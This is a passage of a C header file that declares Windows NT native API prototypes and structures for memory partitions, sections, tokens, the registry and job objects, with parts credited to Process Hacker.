SystemMemoryPartitionClearAttributes,
SystemMemoryPartitionSetMemoryThresholds,
SystemMemoryPartitionMemoryListCommand,
SystemMemoryPartitionMax
} MEMORY_PARTITION_INFORMATION_CLASS;
typedef struct _MEMORY_PARTITION_PAGE_RANGE {
ULONG_PTR StartPage;
ULONG_PTR NumberOfPages;
} MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE;
typedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION {
ULONG Flags;
ULONG NumberOfRanges;
ULONG_PTR NumberOfPagesAdded;
MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1];
} MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION;
typedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION {
PVOID StopHandle;
ULONG Flags;
ULONG_PTR TotalNumberOfPages;
} MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION;
typedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION {
UNICODE_STRING PageFileName;
LARGE_INTEGER MinimumSize;
LARGE_INTEGER MaximumSize;
ULONG Flags;
} MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION;
typedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION {
ULONG_PTR NumberOfPages;
ULONG NumaNode;
ULONG Flags;
} MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION;
typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION {
ULONG Flags;
ULONG NumaNode;
ULONG Channel;
ULONG NumberOfNumaNodes;
ULONG_PTR ResidentAvailablePages;
ULONG_PTR CommittedPages;
ULONG_PTR CommitLimit;
ULONG_PTR PeakCommitment;
ULONG_PTR TotalNumberOfPages;
ULONG_PTR AvailablePages;
ULONG_PTR ZeroPages;
ULONG_PTR FreePages;
ULONG_PTR StandbyPages;
// Fields added RS1+
ULONG_PTR StandbyPageCountByPriority[8];
ULONG_PTR RepurposedPagesByPriority[8];
ULONG_PTR MaximumCommitLimit;
ULONG_PTR DonatedPagesToPartitions;
ULONG PartitionId;
} MEMORY_PARTITION_CONFIGURATION_INFORMATION, * PMEMORY_PARTITION_CONFIGURATION_INFORMATION;
NTSYSAPI
NTSTATUS
NTAPI
NtCreateSection(
_Out_ PHANDLE SectionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ PLARGE_INTEGER MaximumSize,
_In_ ULONG SectionPageProtection,
_In_ ULONG AllocationAttributes,
_In_opt_ HANDLE FileHandle);
//taken from ph2
NTSYSAPI
NTSTATUS
NTAPI
NtCreateSectionEx(
_Out_ PHANDLE SectionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_opt_ PLARGE_INTEGER MaximumSize,
_In_ ULONG SectionPageProtection,
_In_ ULONG AllocationAttributes,
_In_opt_ HANDLE FileHandle,
_Inout_updates_opt_(ExtendedParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,
_In_ ULONG ExtendedParameterCount);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenSection(
_Out_ PHANDLE SectionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtMapViewOfSection(
_In_ HANDLE SectionHandle,
_In_ HANDLE ProcessHandle,
_Inout_ _At_(*BaseAddress, _Readable_bytes_(*ViewSize) _Writable_bytes_(*ViewSize) _Post_readable_byte_size_(*ViewSize)) PVOID *BaseAddress,
_In_ ULONG_PTR ZeroBits,
_In_ SIZE_T CommitSize,
_Inout_opt_ PLARGE_INTEGER SectionOffset,
_Inout_ PSIZE_T ViewSize,
_In_ SECTION_INHERIT InheritDisposition,
_In_ ULONG AllocationType,
_In_ ULONG Win32Protect);
//taken from ph2
NTSYSAPI
NTSTATUS
NTAPI
NtMapViewOfSectionEx(
_In_ HANDLE SectionHandle,
_In_ HANDLE ProcessHandle,
_Inout_ _At_(*BaseAddress, _Readable_bytes_(*ViewSize) _Writable_bytes_(*ViewSize) _Post_readable_byte_size_(*ViewSize)) PVOID* BaseAddress,
_Inout_opt_ PLARGE_INTEGER SectionOffset,
_Inout_ PSIZE_T ViewSize,
_In_ ULONG AllocationType,
_In_ ULONG Win32Protect,
_Inout_updates_opt_(ParameterCount) PMEM_EXTENDED_PARAMETER ExtendedParameters,
_In_ ULONG ExtendedParameterCount);
NTSYSAPI
NTSTATUS
NTAPI
NtUnmapViewOfSection(
_In_ HANDLE ProcessHandle,
_In_opt_ PVOID BaseAddress);
NTSYSAPI
NTSTATUS
NTAPI
NtUnmapViewOfSectionEx(
_In_ HANDLE ProcessHandle,
_In_opt_ PVOID BaseAddress,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
NtQuerySection(
_In_ HANDLE SectionHandle,
_In_ SECTION_INFORMATION_CLASS SectionInformationClass,
_Out_writes_bytes_(SectionInformationLength) PVOID SectionInformation,
_In_ SIZE_T SectionInformationLength,
_Out_opt_ PSIZE_T ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtExtendSection(
_In_ HANDLE SectionHandle,
_Inout_ PLARGE_INTEGER NewSectionSize);
NTSYSAPI
NTSTATUS
NTAPI
NtMapUserPhysicalPages(
_In_ PVOID VirtualAddress,
_In_ ULONG_PTR NumberOfPages,
_In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray);
NTSYSAPI
NTSTATUS
NTAPI
NtMapUserPhysicalPagesScatter(
_In_reads_(NumberOfPages) PVOID *VirtualAddresses,
_In_ ULONG_PTR NumberOfPages,
_In_reads_opt_(NumberOfPages) PULONG_PTR UserPfnArray);
NTSYSAPI
NTSTATUS
NTAPI
NtAllocateUserPhysicalPages(
_In_ HANDLE ProcessHandle,
_Inout_ PULONG_PTR NumberOfPages,
_Out_writes_(*NumberOfPages) PULONG_PTR UserPfnArray);
NTSYSAPI
NTSTATUS
NTAPI
NtFreeUserPhysicalPages(
_In_ HANDLE ProcessHandle,
_Inout_ PULONG_PTR NumberOfPages,
_In_reads_(*NumberOfPages) PULONG_PTR UserPfnArray);
NTSYSAPI
NTSTATUS
NTAPI
NtAreMappedFilesTheSame(
_In_ PVOID File1MappedAsAnImage,
_In_ PVOID File2MappedAsFile);
//
// NtCreatePartition
//
//
// 10248
//
typedef NTSTATUS(NTAPI* pfnNtCreatePartitionV1)(
_Out_ PHANDLE PartitionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG PreferredNode);
//
// 10586
//
typedef NTSTATUS(NTAPI* pfnNtCreatePartitionV2)(
_In_ HANDLE ParentPartitionHandle,
_Out_ HANDLE* PartitionHandle,
_In_ ULONG DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG Node);
//
// Actual NtCreatePartition definition since Win10 10586
//
NTSYSAPI
NTSTATUS
NTAPI
NtCreatePartition(
_In_ HANDLE ParentPartitionHandle,
_Out_ HANDLE* PartitionHandle,
_In_ ULONG DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG Node);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenPartition(
_Out_ PHANDLE PartitionHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtManagePartition(
_In_ HANDLE TargetHandle,
_In_opt_ HANDLE SourceHandle,
_In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass,
_Inout_updates_bytes_(PartitionInformationLength) PVOID PartitionInformation,
_In_ ULONG PartitionInformationLength);
/************************************************************************************
*
* Token API.
*
************************************************************************************/
//
// This part is taken from PH ntseapi.h.
//
// Types
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INVALID 0x00
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_INT64 0x01
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_UINT64 0x02
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_STRING 0x03
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_FQBN 0x04
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_SID 0x05
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_BOOLEAN 0x06
#define TOKEN_SECURITY_ATTRIBUTE_TYPE_OCTET_STRING 0x10
// Flags
#define TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE 0x0001
#define TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE 0x0002
#define TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY 0x0004
#define TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT 0x0008
#define TOKEN_SECURITY_ATTRIBUTE_DISABLED 0x0010
#define TOKEN_SECURITY_ATTRIBUTE_MANDATORY 0x0020
#define TOKEN_SECURITY_ATTRIBUTE_COMPARE_IGNORE 0x0040
#define TOKEN_SECURITY_ATTRIBUTE_VALID_FLAGS ( \
TOKEN_SECURITY_ATTRIBUTE_NON_INHERITABLE | \
TOKEN_SECURITY_ATTRIBUTE_VALUE_CASE_SENSITIVE | \
TOKEN_SECURITY_ATTRIBUTE_USE_FOR_DENY_ONLY | \
TOKEN_SECURITY_ATTRIBUTE_DISABLED_BY_DEFAULT | \
TOKEN_SECURITY_ATTRIBUTE_DISABLED | \
TOKEN_SECURITY_ATTRIBUTE_MANDATORY)
#define TOKEN_SECURITY_ATTRIBUTE_CUSTOM_FLAGS 0xffff0000
typedef struct _TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE
{
ULONG64 Version;
UNICODE_STRING Name;
} TOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE;
typedef struct _TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE
{
PVOID pValue;
ULONG ValueLength;
} TOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE, *PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE;
typedef struct _TOKEN_SECURITY_ATTRIBUTE_V1
{
UNICODE_STRING Name;
USHORT ValueType;
USHORT Reserved;
ULONG Flags;
ULONG ValueCount;
union
{
PLONG64 pInt64;
PULONG64 pUint64;
PUNICODE_STRING pString;
PTOKEN_SECURITY_ATTRIBUTE_FQBN_VALUE pFqbn;
PTOKEN_SECURITY_ATTRIBUTE_OCTET_STRING_VALUE pOctetString;
} Values;
} TOKEN_SECURITY_ATTRIBUTE_V1, *PTOKEN_SECURITY_ATTRIBUTE_V1;
#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1 1
#define TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION TOKEN_SECURITY_ATTRIBUTES_INFORMATION_VERSION_V1
typedef struct _TOKEN_SECURITY_ATTRIBUTES_INFORMATION
{
USHORT Version;
USHORT Reserved;
ULONG AttributeCount;
union
{
PTOKEN_SECURITY_ATTRIBUTE_V1 pAttributeV1;
} Attribute;
} TOKEN_SECURITY_ATTRIBUTES_INFORMATION, *PTOKEN_SECURITY_ATTRIBUTES_INFORMATION;
//
// endof ntseapi.h
//
NTSYSAPI
NTSTATUS
NTAPI
NtAccessCheck(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_In_ HANDLE ClientToken,
_In_ ACCESS_MASK DesiredAccess,
_In_ PGENERIC_MAPPING GenericMapping,
_Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,
_Inout_ PULONG PrivilegeSetLength,
_Out_ PACCESS_MASK GrantedAccess,
_Out_ PNTSTATUS AccessStatus);
NTSYSAPI
NTSTATUS
NTAPI
NtAccessCheckByType(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_In_opt_ PSID PrincipalSelfSid,
_In_ HANDLE ClientToken,
_In_ ACCESS_MASK DesiredAccess,
_In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList,
_In_ ULONG ObjectTypeListLength,
_In_ PGENERIC_MAPPING GenericMapping,
_Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,
_Inout_ PULONG PrivilegeSetLength,
_Out_ PACCESS_MASK GrantedAccess,
_Out_ PNTSTATUS AccessStatus);
NTSYSAPI
NTSTATUS
NTAPI
NtAccessCheckByTypeResultList(
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_In_opt_ PSID PrincipalSelfSid,
_In_ HANDLE ClientToken,
_In_ ACCESS_MASK DesiredAccess,
_In_reads_(ObjectTypeListLength) POBJECT_TYPE_LIST ObjectTypeList,
_In_ ULONG ObjectTypeListLength,
_In_ PGENERIC_MAPPING GenericMapping,
_Out_writes_bytes_(*PrivilegeSetLength) PPRIVILEGE_SET PrivilegeSet,
_Inout_ PULONG PrivilegeSetLength,
_Out_writes_(ObjectTypeListLength) PACCESS_MASK GrantedAccess,
_Out_writes_(ObjectTypeListLength) PNTSTATUS AccessStatus);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenObjectAuditAlarm(
_In_ PUNICODE_STRING SubsystemName,
_In_opt_ PVOID HandleId,
_In_ PUNICODE_STRING ObjectTypeName,
_In_ PUNICODE_STRING ObjectName,
_In_opt_ PSECURITY_DESCRIPTOR SecurityDescriptor,
_In_ HANDLE ClientToken,
_In_ ACCESS_MASK DesiredAccess,
_In_ ACCESS_MASK GrantedAccess,
_In_opt_ PPRIVILEGE_SET Privileges,
_In_ BOOLEAN ObjectCreation,
_In_ BOOLEAN AccessGranted,
_Out_ PBOOLEAN GenerateOnClose);
NTSYSAPI
NTSTATUS
NTAPI
NtCloseObjectAuditAlarm(
_In_ PUNICODE_STRING SubsystemName,
_In_opt_ PVOID HandleId,
_In_ BOOLEAN GenerateOnClose);
NTSYSAPI
NTSTATUS
NTAPI
NtDeleteObjectAuditAlarm(
_In_ PUNICODE_STRING SubsystemName,
_In_opt_ PVOID HandleId,
_In_ BOOLEAN GenerateOnClose);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcessToken(
_In_ HANDLE ProcessHandle,
_In_ ACCESS_MASK DesiredAccess,
_Out_ PHANDLE TokenHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcessTokenEx(
_In_ HANDLE ProcessHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ ULONG HandleAttributes,
_Out_ PHANDLE TokenHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtDuplicateToken(
_In_ HANDLE ExistingTokenHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ BOOLEAN EffectiveOnly,
_In_ TOKEN_TYPE TokenType,
_Out_ PHANDLE NewTokenHandle);
#ifndef DISABLE_MAX_PRIVILEGE
#define DISABLE_MAX_PRIVILEGE 0x1 // winnt
#endif
#ifndef SANDBOX_INERT
#define SANDBOX_INERT 0x2 // winnt
#endif
#ifndef LUA_TOKEN
#define LUA_TOKEN 0x4 // winnt
#endif
#ifndef WRITE_RESTRICTED
#define WRITE_RESTRICTED 0x8 // winnt
#endif
NTSYSAPI
NTSTATUS
NTAPI
NtFilterToken(
_In_ HANDLE ExistingTokenHandle,
_In_ ULONG Flags,
_In_opt_ PTOKEN_GROUPS SidsToDisable,
_In_opt_ PTOKEN_PRIVILEGES PrivilegesToDelete,
_In_opt_ PTOKEN_GROUPS RestrictedSids,
_Out_ PHANDLE NewTokenHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtImpersonateAnonymousToken(
_In_ HANDLE ThreadHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationToken(
_In_ HANDLE TokenHandle,
_In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
_Out_writes_bytes_to_opt_(TokenInformationLength, *ReturnLength) PVOID TokenInformation,
_In_ ULONG TokenInformationLength,
_Out_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationToken(
_In_ HANDLE TokenHandle,
_In_ TOKEN_INFORMATION_CLASS TokenInformationClass,
_In_reads_bytes_(TokenInformationLength) PVOID TokenInformation,
_In_ ULONG TokenInformationLength);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenThreadToken(
_In_ HANDLE ThreadHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ BOOLEAN OpenAsSelf,
_Out_ PHANDLE TokenHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenThreadTokenEx(
_In_ HANDLE ThreadHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ BOOLEAN OpenAsSelf,
_In_ ULONG HandleAttributes,
_Out_ PHANDLE TokenHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtAdjustPrivilegesToken(
_In_ HANDLE TokenHandle,
_In_ BOOLEAN DisableAllPrivileges,
_In_opt_ PTOKEN_PRIVILEGES NewState,
_In_ ULONG BufferLength,
_Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_PRIVILEGES PreviousState,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtAdjustGroupsToken(
_In_ HANDLE TokenHandle,
_In_ BOOLEAN ResetToDefault,
_In_opt_ PTOKEN_GROUPS NewState,
_In_opt_ ULONG BufferLength,
_Out_writes_bytes_to_opt_(BufferLength, *ReturnLength) PTOKEN_GROUPS PreviousState,
_Out_opt_ PULONG ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
NtCompareTokens(
_In_ HANDLE FirstTokenHandle,
_In_ HANDLE SecondTokenHandle,
_Out_ PBOOLEAN Equal);
NTSYSAPI
NTSTATUS
NTAPI
NtPrivilegeCheck(
_In_ HANDLE ClientToken,
_Inout_ PPRIVILEGE_SET RequiredPrivileges,
_Out_ PBOOLEAN Result);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateToken(
_Out_ PHANDLE TokenHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ TOKEN_TYPE TokenType,
_In_ PLUID AuthenticationId,
_In_ PLARGE_INTEGER ExpirationTime,
_In_ PTOKEN_USER User,
_In_ PTOKEN_GROUPS Groups,
_In_ PTOKEN_PRIVILEGES Privileges,
_In_opt_ PTOKEN_OWNER Owner,
_In_ PTOKEN_PRIMARY_GROUP PrimaryGroup,
_In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl,
_In_ PTOKEN_SOURCE TokenSource);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateTokenEx(
_Out_ PHANDLE TokenHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ TOKEN_TYPE TokenType,
_In_ PLUID AuthenticationId,
_In_ PLARGE_INTEGER ExpirationTime,
_In_ PTOKEN_USER User,
_In_ PTOKEN_GROUPS Groups,
_In_ PTOKEN_PRIVILEGES Privileges,
_In_opt_ PVOID UserAttributes, // points to TOKEN_SECURITY_ATTRIBUTES_INFORMATION
_In_opt_ PVOID DeviceAttributes, // points to PTOKEN_SECURITY_ATTRIBUTES_INFORMATION
_In_opt_ PTOKEN_GROUPS DeviceGroups,
_In_opt_ PTOKEN_MANDATORY_POLICY TokenMandatoryPolicy,
_In_opt_ PTOKEN_OWNER Owner,
_In_ PTOKEN_PRIMARY_GROUP PrimaryGroup,
_In_opt_ PTOKEN_DEFAULT_DACL DefaultDacl,
_In_ PTOKEN_SOURCE TokenSource);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateLowBoxToken(
_Out_ PHANDLE TokenHandle,
_In_ HANDLE ExistingTokenHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ PSID PackageSid,
_In_ ULONG CapabilityCount,
_In_reads_opt_(CapabilityCount) PSID_AND_ATTRIBUTES Capabilities,
_In_ ULONG HandleCount,
_In_reads_opt_(HandleCount) HANDLE *Handles);
/************************************************************************************
*
* Registry API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtCreateKey(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_Reserved_ ULONG TitleIndex,
_In_opt_ PUNICODE_STRING Class,
_In_ ULONG CreateOptions,
_Out_opt_ PULONG Disposition);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateKeyTransacted(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_Reserved_ ULONG TitleIndex,
_In_opt_ PUNICODE_STRING Class,
_In_ ULONG CreateOptions,
_In_ HANDLE TransactionHandle,
_Out_opt_ PULONG Disposition);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenKey(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenKeyEx(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG OpenOptions);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenKeyTransacted(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ HANDLE TransactionHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenKeyTransactedEx(
_Out_ PHANDLE KeyHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ ULONG OpenOptions,
_In_ HANDLE TransactionHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryKey(
_In_ HANDLE KeyHandle,
_In_ KEY_INFORMATION_CLASS KeyInformationClass,
_Out_writes_bytes_opt_(Length) PVOID KeyInformation,
_In_ ULONG Length,
_Out_ PULONG ResultLength);
NTSYSAPI
NTSTATUS
NTAPI
NtEnumerateKey(
_In_ HANDLE KeyHandle,
_In_ ULONG Index,
_In_ KEY_INFORMATION_CLASS KeyInformationClass,
_Out_writes_bytes_opt_(Length) PVOID KeyInformation,
_In_ ULONG Length,
_Out_ PULONG ResultLength);
NTSYSAPI
NTSTATUS
NTAPI
NtEnumerateValueKey(
_In_ HANDLE KeyHandle,
_In_ ULONG Index,
_In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
_Out_writes_bytes_opt_(Length) PVOID KeyValueInformation,
_In_ ULONG Length,
_Out_ PULONG ResultLength);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryValueKey(
_In_ HANDLE KeyHandle,
_In_ PUNICODE_STRING ValueName,
_In_ KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass,
_Out_writes_bytes_opt_(Length) PVOID KeyValueInformation,
_In_ ULONG Length,
_Out_ PULONG ResultLength);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryMultipleValueKey(
_In_ HANDLE KeyHandle,
_Inout_updates_(EntryCount) PKEY_VALUE_ENTRY ValueEntries,
_In_ ULONG EntryCount,
_Out_writes_bytes_(*BufferLength) PVOID ValueBuffer,
_Inout_ PULONG BufferLength,
_Out_opt_ PULONG RequiredBufferLength);
NTSYSAPI
NTSTATUS
NTAPI
NtSetValueKey(
_In_ HANDLE KeyHandle,
_In_ PUNICODE_STRING ValueName,
_In_ ULONG TitleIndex,
_In_ ULONG Type,
_In_reads_bytes_opt_(DataSize) PVOID Data,
_In_ ULONG DataSize);
NTSYSAPI
NTSTATUS
NTAPI
NtDeleteKey(
_In_ HANDLE KeyHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtDeleteValueKey(
_In_ HANDLE KeyHandle,
_In_ PUNICODE_STRING ValueName);
NTSYSAPI
NTSTATUS
NTAPI
NtRenameKey(
_In_ HANDLE KeyHandle,
_In_ PUNICODE_STRING NewName);
NTSYSAPI
NTSTATUS
NTAPI
NtSetInformationKey(
_In_ HANDLE KeyHandle,
_In_ KEY_SET_INFORMATION_CLASS KeySetInformationClass,
_In_reads_bytes_(KeySetInformationLength) PVOID KeySetInformation,
_In_ ULONG KeySetInformationLength);
NTSYSAPI
NTSTATUS
NTAPI
NtFlushKey(
_In_ HANDLE KeyHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtCompressKey(
_In_ HANDLE Key);
NTSYSAPI
NTSTATUS
NTAPI
NtLoadKey(
_In_ POBJECT_ATTRIBUTES TargetKey,
_In_ POBJECT_ATTRIBUTES SourceFile);
NTSYSAPI
NTSTATUS
NTAPI
NtLoadKey2(
_In_ POBJECT_ATTRIBUTES TargetKey,
_In_ POBJECT_ATTRIBUTES SourceFile,
_In_ ULONG Flags);
//https://gist.github.com/tyranid/1db47869da253a912242c694e921009d#file-ntloadkeyex3-h
typedef enum _KEY_LOAD_HANDLE_TYPE {
KeyLoadTrustKey = 1,
KeyLoadEvent,
KeyLoadToken
} KEY_LOAD_HANDLE_TYPE;
typedef struct _KEY_LOAD_HANDLE {
KEY_LOAD_HANDLE_TYPE Type;
HANDLE Handle;
} KEY_LOAD_HANDLE, *PKEY_LOAD_HANDLE;
NTSYSAPI
NTSTATUS
NTAPI
NtLoadKey3(
_In_ POBJECT_ATTRIBUTES TargetKey,
_In_ POBJECT_ATTRIBUTES SourceFile,
_In_ ULONG Flags,
_In_ PKEY_LOAD_HANDLE LoadEntries,
_In_ ULONG LoadEntryCount,
_In_opt_ ACCESS_MASK DesiredAccess,
_Out_opt_ PHANDLE RootHandle,
_In_ PVOID Unused);
NTSYSAPI
NTSTATUS
NTAPI
NtLoadKeyEx(
_In_ POBJECT_ATTRIBUTES TargetKey,
_In_ POBJECT_ATTRIBUTES SourceFile,
_In_ ULONG Flags,
_In_opt_ HANDLE TrustClassKey,
_In_opt_ HANDLE Event,
_In_opt_ ACCESS_MASK DesiredAccess,
_Out_opt_ PHANDLE RootHandle,
_Out_opt_ PIO_STATUS_BLOCK IoStatus);
NTSYSAPI
NTSTATUS
NTAPI
NtSaveKey(
_In_ HANDLE KeyHandle,
_In_ HANDLE FileHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtSaveKeyEx(
_In_ HANDLE KeyHandle,
_In_ HANDLE FileHandle,
_In_ ULONG Format);
NTSYSAPI
NTSTATUS
NTAPI
NtUnloadKey(
_In_ POBJECT_ATTRIBUTES TargetKey);
NTSYSAPI
NTSTATUS
NTAPI
NtUnloadKey2(
_In_ POBJECT_ATTRIBUTES TargetKey,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
NtUnloadKeyEx(
_In_ POBJECT_ATTRIBUTES TargetKey,
_In_opt_ HANDLE Event);
NTSYSAPI
NTSTATUS
NTAPI
NtNotifyChangeKey(
_In_ HANDLE KeyHandle,
_In_opt_ HANDLE Event,
_In_opt_ PIO_APC_ROUTINE ApcRoutine,
_In_opt_ PVOID ApcContext,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_In_ ULONG CompletionFilter,
_In_ BOOLEAN WatchTree,
_Out_writes_bytes_opt_(BufferSize) PVOID Buffer,
_In_ ULONG BufferSize,
_In_ BOOLEAN Asynchronous);
NTSYSAPI
NTSTATUS
NTAPI
NtLockRegistryKey(
_In_ HANDLE KeyHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateRegistryTransaction(
_Out_ PHANDLE Handle,
_In_ ACCESS_MASK DesiredAccess, //generic + TRANSACTION_*
_In_ POBJECT_ATTRIBUTES ObjectAttributes,
_In_ DWORD Flags);
NTSYSAPI
NTSTATUS
NTAPI
NtCommitRegistryTransaction(
_In_ HANDLE RegistryHandle,
_In_ BOOL Wait);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenRegistryTransaction(
_Out_ PHANDLE RegistryHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtRollbackRegistryTransaction(
_In_ HANDLE RegistryHandle,
_In_ BOOL Wait);
/************************************************************************************
*
* Job API.
*
************************************************************************************/
NTSYSAPI
NTSTATUS
NTAPI
NtAssignProcessToJobObject(
_In_ HANDLE JobHandle,
_In_ HANDLE ProcessHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateJobObject(
_Out_ PHANDLE JobHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtCreateJobSet(
_In_ ULONG NumJob,
_In_reads_(NumJob) PJOB_SET_ARRAY UserJobSet,
_In_ ULONG Flags);
NTSYSAPI
NTSTATUS
NTAPI
NtIsProcessInJob(
_In_ HANDLE ProcessHandle,
_In_opt_ HANDLE JobHandle);
NTSYSAPI
NTSTATUS
NTAPI
NtOpenJobObject(
_Out_ PHANDLE JobHandle,
_In_ ACCESS_MASK DesiredAccess,
_In_ POBJECT_ATTRIBUTES ObjectAttributes);
NTSYSAPI
NTSTATUS
NTAPI
NtQueryInformationJobObject(
_In_opt_ HANDLE JobHandle,
_In_ JOBOBJECTINFOCLASS JobObjectInformationClass,
_Out_writes_bytes_(JobObjectInformationLength) PVOID JobObjectInformation,
_In_ ULONG JobObjectInformationLength,
_Out_opt_ PULONG ReturnLength);
